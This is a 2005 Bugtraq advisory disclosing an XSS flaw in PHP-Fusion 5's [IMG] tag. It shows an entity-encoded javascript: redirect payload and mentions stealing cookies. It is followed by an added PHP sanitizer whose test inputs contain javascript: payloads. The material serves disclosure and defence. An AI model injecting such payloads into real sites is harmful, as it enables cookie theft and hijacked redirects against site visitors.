List: bugtraq
Subject: PHP-FUSION 5.* XSS VULNERABILITY
From: FireSt0rm <firest0rm.uh () gmail ! com>
Date: 2005-03-06 16:58:45
Message-ID: 20050306165845.9938.qmail () www ! securityfocus ! com
I found an exploit in the current version of php-fusion which allows you to input XSS in the [IMG] tag. I reported it already to php-fusion and they created a fix for this. Here it goes:
By converting the text (i.e. javascript:alert('test')) to their ASCII values, the strings between the [img][/img] tags aren't checked by the filter. And this way, you can send it and it will be executed.
You can do other things like display cookies, steal cookies, redirections etc.
EXAMPLE:
[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]
would be replaced by
[IMG]javascript:docume& \
#110t.location='http: \
7/www.albinoblacksh&# \
101ep.com/flash/you.html'[/IMG]
FIX:
Filter out characters like '&' and '#'.
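
As an added example (not part of the original post and not PHP-Fusion's actual fix), one way to handle the [IMG] case on the server: decode character references first, then allow only http/https URLs and HTML-escape the result. The function name `render_img_bbcode` and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not PHP-Fusion's own code.

/** Return an <img> tag for the text between [img] and [/img], or '' if rejected. */
function render_img_bbcode(string $raw): string
{
    $url = trim($raw);

    // Canonicalise first: decode character references until the value is
    // stable, so the checks below see plain characters, not "&#110;"-style text.
    for ($round = 0; $round < 5; $round++) {
        // Browsers accept numeric references without the closing ";".
        $closed  = preg_replace('/&#(x[0-9a-f]+|[0-9]+);?/i', '&#$1;', $url);
        $decoded = html_entity_decode($closed, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        if ($decoded === $url) {
            break;
        }
        $url = $decoded;
    }
    if ($round === 5) {
        return '';  // still changing after 5 rounds: nested encoding, reject
    }

    // No control characters, whitespace, quotes or angle brackets in the URL.
    if (preg_match('/[\x00-\x20\x7f"\'<>]/', $url)) {
        return '';
    }

    // Allowlist the scheme instead of trying to blocklist "javascript:".
    if (!preg_match('#^https?://[^/]#i', $url)) {
        return '';
    }

    return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
}

// Constructed sample inputs.
$samples = [
    'http://example.com/pic.png',
    "javascript:alert('test')",
    "jav&#97;script:alert('test')",
    "jav&#97script:alert('test')",          // numeric reference without ";"
    'http://example.com/a.png" onerror="x', // attribute breakout attempt
];
foreach ($samples as $s) {
    printf("%-45s => %s\n", $s, render_img_bbcode($s) ?: '(rejected)');
}
```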